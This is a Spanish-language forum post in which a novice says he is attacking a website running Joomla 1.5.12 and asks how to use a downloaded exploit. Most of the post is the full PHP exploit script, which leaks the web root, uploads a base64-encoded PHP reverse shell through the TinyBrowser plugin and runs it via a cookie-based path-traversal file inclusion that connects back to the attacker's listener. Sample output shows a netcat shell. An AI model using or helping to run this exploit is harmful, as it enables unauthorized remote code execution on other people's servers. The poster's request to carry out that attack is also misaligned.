estoy incursionando en esto del hacking y mis limitados conocimientos se han visto sobrepasados por un problema.
estoy atacando un sitio web el cual he llegado a la conclusion que tiene : joomla 1.5.12 pues hice un scan con joomscan desde backtrack 5 y las vulnerabilidades encontradas son hasta dicha version. la vulnerabilidad que intento explotar es :
#
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes
baje un exploit en PHP pero nose como lanzarlo o explotarlo . y esa es precisamente mi pregunta ¿como utilizo el exploit y aprovecho la vulnerabilidad?
dejo el exploit aqui :
Código:
# Title: Joomla 1.5.12 connect back exploit
# EDB-ID: 11262
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Nikola Petrov
# Published: 2010-01-26
# Verified: no
# Download Exploit Code
# Download N/A
#!/usr/bin/php
<?php
/*
Copyright (c) ITIX LTD
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
TITLE: Joomla 1.5.12 connect back exploit
AUTHOR: Nikola Petrov (vp.nikola@gmail.com)
VERSION: 1.0
LICENSE: GNU General Public License
Platform: Joomla 1.5.12
Vulnerabilities discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)
Date: 27.08.2009
Joomla 1.5.12 suffers from different kinds of vulnerabilities:
- path disclosure
- unauthorized file upload
- local file inclusion
I heard of unauthorized file upload in Joomla 1.5.12 and I decided to make some research on the topic. Soon after
that I found two more vulnerabilities - path disclosure and local file inclusion. Maybe there are more vulnerabilities
but these are enough to get a connection back from the server.
Path disclosure: joomla/libraries/joomla/client/ldap.php
Unauthorized file upload: joomla/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php (upload_file.php)
Local file inclusion: joomla/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php
Here is the LFI vulnerability:
-- snip-snip: folders.php --
<?php
require_once('config_tinybrowser.php');
// Set language
if(isset($tinybrowser['language']) && file_exists('langs/'.$tinybrowser['language'].'.php')) {
require_once('langs/'.$tinybrowser['language'].'.php');
}
else {
require_once('langs/en.php'); // Falls back to English
}
...
-- snip-snip --
[wadmin@M01 1.5.12]$ ./jtiny-1-5-12.php % 80 / % 9090
[+] web root: /var/www/html
[+] tinybrowser secret: s0merand0mjunk!!!111
[+] Shell successfully uploaded.
[+] Executing shell...
[wadmin@M01 1.5.12]$
[wadmin@M01 /]$ nc -vvv -l 9090
Connection from 127.0.0.1 port 9090 [tcp/websm] accepted
id && uname -a
uid=48(apache) gid=48(apache) groups=48(apache)
Linux M01 2.6.30 #1 SMP Tue Jun 16 19:34:59 EEST 2009 i686 i686 i386 GNU/Linux
exit
[wadmin@M01 /]$
*/
if($argc < 6) {
print "\tvulnerabilities discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)\n";
print "\tusage: ./jtiny-1-5-12.php <remote host> <remote port> <remote path> <local address> <local port> [remote doc root] [tinybrowser secret/obfuscate]\n";
print "\texample: jtiny-1-5-12.php % 80 / % 9090\n\n";
exit();
}
$RemoteHost = $argv[1];
$RemotePort = $argv[2];
$RemotePath = $argv[3];
$LocalAddress = $argv[4];
$LocalPort = $argv[5];
if($argc == 7) $RemoteDocRoot = $argv[6];
else $RemoteDocRoot = getRemoteDocRoot($RemoteHost, $RemotePath);
if($argc == 8) $Secret = $argv[7];
else $Secret = "s0merand0mjunk!!!111";
print "[+] web root: $RemoteDocRoot\n";
print "[+] tinybrowser secret: $Secret\n";
$Shell =
"PD9waHAKCSRBZGRyZXNzID0gJF9HRVRbJ19yYWRkcmVz".
"cyddOwoJJFBvcnQgPSAkX0dFVFsnX3Jwb3J0J107CgoJ".
"QCRTb2NrZXQgPSBzdHJlYW1fc29ja2V0X2NsaWVudCgi".
"dGNwOi8vJEFkZHJlc3M6JFBvcnQiKSBvciBkaWUoIkNh".
"bm5vdCBjb25uZWN0IGJhY2sgYXQgJEFkZHJlc3M6JFBv".
"cnRcbiIpOwoJJFByb2MgPSBwcm9jX29wZW4oJy9iaW4v".
"c2gnICxhcnJheShhcnJheSgncGlwZScsJ3InKSAsYXJy".
"YXkoJ3BpcGUnLCd3JykgLGFycmF5KCdwaXBlJywndycp".
"KSwgJFApOwoJCgkkUEk9JFBbMF07CgkkUE89JFBbMV07".
"CgkkUEU9JFBbMl07CgoJJE51bGwgPSBudWxsOwoKCXdo".
"aWxlKDEpIHsKCQkkU0w9YXJyYXkoJFNvY2tldCwkUE8s".
"JFBFKTsKCQlzdHJlYW1fc2VsZWN0KCRTTCwgJE51bGws".
"ICROdWxsLCAxKTsKCgkJZm9yZWFjaCgkU0wgYXMgJiRW".
"KSAgewoJCQlpZigkVj09PSRTb2NrZXQpIGZ3cml0ZSgk".
"UEksZnJlYWQoJFNvY2tldCwgNDA5NikpOwoJCQllbHNl".
"aWYgKCRWPT09JFBPKSBmd3JpdGUoJFNvY2tldCxmcmVh".
"ZCgkUE8sIDQwOTYpKTsKCQkJZWxzZWlmKCRWPT09JFBF".
"KSBmd3JpdGUoJFNvY2tldCxmcmVhZCgkUEUsIDQwOTYp".
"KTsKCQkJaWYoZmVvZigkU29ja2V0KSB8fCBmZW9mKCRQ".
"TykpIGV4aXQ7CgkJfQoJfQo/Pgo=";
$File = fopen("./_shell", "w") or die("Cannot open: ./_shell");
fwrite($File, base64_decode($Shell));
fclose($File);
#print "uploadFile($RemoteHost, $RemotePath, ./_shell, md5($RemoteDocRoot.$Secret)\n";
if(uploadFile($RemoteHost, $RemotePath, "./_shell", md5($RemoteDocRoot.$Secret)) == false) {
print "[-] Cannot upload shell.\n\n";
unlink("_shell");
exit();
}
else print "[+] Shell successfully uploaded.\n";
unlink("_shell");
print "[+] Executing shell...\n";
shellExec($RemoteHost, $RemotePath, $RemoteDocRoot, $LocalAddress, $LocalPort);
function getRemoteDocRoot($aRemoteHost, $aRemotePath) {
$Client = curl_init();
curl_setopt($Client, CURLOPT_URL, $aRemoteHost . $aRemotePath . "/libraries/joomla/client/ldap.php");
curl_setopt($Client, CURLOPT_RETURNTRANSFER, 1) ;
curl_setopt($Client, CURLOPT_HEADER, 0);
$Response = curl_exec($Client);
if(($HttpCode = curl_getinfo($Client, CURLINFO_HTTP_CODE)) != 200) {
print "[-] getRemoteDocRoot() recieved http code $HttpCode.\n";
exit();
}
curl_close($Client);
$Step1 = strpos($Response, "not found in <b>") + 16;
$Step2 = strpos($Response, "/libraries/joomla/");
if(strlen($aRemotePath) > 1) return substr(substr($Response, $Step1, $Step2 - $Step1), 0, -strlen($aRemotePath));
else return substr($Response, $Step1, $Step2 - $Step1);
}
function uploadFile($aRemoteHost, $aRemotePath, $aFilePath, $aSecret) {
$Client = curl_init("http://$aRemoteHost$aRemotePath/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload_file.php?folder=". $aRemotePath ."/images/stories&type=image&feid=&obfuscate=$aSecret&sessidpass=");
curl_setopt($Client, CURLOPT_POSTFIELDS, array('Filedata'=>"@$aFilePath"));
curl_setopt($Client, CURLOPT_RETURNTRANSFER, 1);
$Response = curl_exec($Client);
if(($HttpCode = curl_getinfo($Client, CURLINFO_HTTP_CODE)) != 200) {
print "[-] uploadFile() recieved http code $HttpCode.\n";
exit();
}
curl_close($Client);
return strpos($Response, "File Upload Success");
}
function shellExec($aRemoteHost, $aRemotePath, $aRemoteDocRoot, $aLocalAddress, $aLocalPort) {
$Shell = "../../../../../../../../../../../../../../../../../../../../../../../../../../". $aRemoteDocRoot . $aRemotePath ."/images/stories/_shell_%00";
$VulnerableFile = $aRemoteHost . $aRemotePath . "/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php?_raddress=$aLocalAddress&_rport=$aLocalPort";
$Client = curl_init();
curl_setopt($Client, CURLOPT_URL, $VulnerableFile);
curl_setopt($Client, CURLOPT_RETURNTRANSFER, 1) ;
curl_setopt($Client, CURLOPT_HEADER, 0);
curl_setopt($Client, CURLOPT_COOKIE, "tinybrowser_lang=$Shell");
$Response = curl_exec($Client);
curl_close($Client);
print $Response;
}
?>